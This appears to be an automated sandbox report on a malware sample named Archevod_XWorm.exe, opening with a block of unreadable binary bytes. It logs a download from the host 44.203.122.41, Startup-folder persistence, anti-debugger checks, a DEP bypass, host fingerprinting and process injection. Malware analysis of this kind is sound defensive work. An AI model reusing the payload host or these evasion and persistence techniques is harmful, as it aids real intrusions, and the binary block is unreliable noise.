²3ˆRI9}±ÁÂ÷YßªyYÿÃå+E¦<¤±ˆìw½”à~¹ä¹œäߏ˜2Ÿ™©Ž"±†‚:¤ûUêÊ?—æJ<âb´`z=°`{=¼`|=¸`}=„Pߎɩ}õ«¾÷èÄ|Ñ®øÖTKÅr ¶¡;÷¶6·XÉèKó§§'òº‹ýÊםWî¬ Ç@¾¡Å¬¦»³èL}¹ÌØ[rÔ¿”1ÊûbÝ°‘y)îÚKûbÞ°­Äð£-#L®m~DÎٟXÊȏIUá⟠»õ”¸Ù±‹ñ§DÚÏLž”=ȜtØtà0=–ÛèXñkÐÍç¸x(îƒz8ضĿع7y!瀼űh…‚¡ƒ°Õ`Q3봖Áaž¡|ìy½Ãß±¨XÏr—®Ï•|±‹„ÊJ㊔ޛPlŽš=¥Ø|¥'¶í)Ýmԉ¶ä“Td؉bäAé”õt[˜ÍºÑ:´‰ýÓEŽ˜àÓõ¥†Üm.5eµùû–~\wä̒¹ÚùÎÐÍÎљ׵žñý°†‹É2I*åÁk“1,µiÇÒ̄ñRЃG`Noº˜d× Ö³°tÐmí3äý½åÅiX.¦J~Úçк[Aø§šÂf™›/˜þæÀhÐäÝ$i–ƒåÅEë6èݚÕJ<=ѸϘÂ#oTª£:¶•IyèœÖ{e+DÊnËYËfꞯçêÙ[©Å(JþÅÖu¶•ÅÊ°UîŠÓŸ@4pàúé=ðœ—Mù%QBœkäËՐ|qÌ{lΕq_@e+h)QqõüæÊ-B.–µS>Ç9w7L´ßéüJfNìëûÝb™Ã£&á ˜ø¥ÁÒñžífž5!È !=¬ Fc\q»Ó‰:OÏ9s"tc£•rc·ŠV™ª6…숿5yòšB7`=XDŠbÓ>q¶ÿŠ®}Ïô:Çòl;풵Ác2!«`Lª€ˆ×F]9DW‡­M€4åQiŽs™¯¯ÂGí ˆö]‚Ó–›gå8ŒŒb“e•‰Š ^pzŸ$®óŸi“]𸿲í}=?Y(—ùegL€ójjËÁ»²ÝWnÍÊú·4? < ¡€×“Gïô´’Ä­kïùÚ¬øêTã¢*2Š ”€ ¿™R6šØ5ØáO—yÓ¬åÁЧõ04(ÇêŦÍ&¥°óš19àm(tƒï˜žXì S_~ëÀMxz]Ž 9¡ôV¤bSR}¨5 ™Xà¥ÁÎ+²Pœ7@ê¶Æ ?Ð^ŸXÓe7Ð0†’âH¨Âü¨©Ð¤:Y××XÁ]ªõŠ ²ã¾ÅàéÏ»tݚ¦ûõ¼;‰pҘʳ“º íÑ3luŒþŽ›˜ í!êʯìJÐGЊÂ
Data sent GET /Archevod_XWorm.exe HTTP/1.1 Host: 44.203.122.41 Connection: Keep-Alive
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
wmi Select * from Win32_ComputerSystem
host 44.203.122.41
file \??\SICE
file \??\SIWDEBUG
file \??\NTICE
Time & API Arguments Status Return Repeated

FindWindowA

class_name: OLLYDBG
window_name:
0 0
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Archevod_XWorm.exe
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Archevod_XWorm.exe
Time & API Arguments Status Return Repeated

send

buffer: GET /Archevod_XWorm.exe HTTP/1.1 Host: 44.203.122.41 Connection: Keep-Alive
socket: 1632
sent: 81
1 81 0
parent_process powershell.exe martian_process C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Archevod_XWorm.exe
parent_process powershell.exe martian_process c:\Users\test22\Music\AnyDesk.exe
parent_process powershell.exe martian_process "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Archevod_XWorm.exe"
Time & API Arguments Status Return Repeated

CryptHashData

buffer: 2test22TEST22-PCMicrosoft Windows NT 6.1.7601 Service Pack 134252779520
hash_handle: 0x009c3690
flags: 0
1 1 0

CryptHashData

buffer: 2test22TEST22-PCMicrosoft Windows NT 6.1.7601 Service Pack 134252779520
hash_handle: 0x009c3690
flags: 0
1 1 0

CryptHashData

buffer: 2test22TEST22-PCMicrosoft Windows NT 6.1.7601 Service Pack 134252779520
hash_handle: 0x009c3690
flags: 0
1 1 0
Process injection Process 1492 resumed a thread in remote process 2292
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x00000778
suspend_count: 1
process_identifier: 2292
1 0 0
Time & API Arguments Status Return Repeated

__exception__

stacktrace:
archevod_xworm+0x193083 @ 0x313083
archevod_xworm+0x19657d @ 0x31657d
archevod_xworm+0x27b1cd @ 0x3fb1cd

exception.instruction_r: ed 68 24 87 79 43 e9 14 9d ff ff d5 8c 72 5c 97
exception.symbol: archevod_xworm+0x187721
exception.instruction: in eax, dx
exception.module: Archevod_XWorm.exe
exception.exception_code: 0xc0000096
exception.offset: 1603361
exception.address: 0x307721
registers.esp: 6748848
registers.edi: 2970096
registers.eax: 1447909480
registers.ebp: 6748876
registers.edx: 22104
registers.ebx: 0
registers.esi: 2950532
registers.ecx: 10
1 0 0
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Archevod_XWorm.exe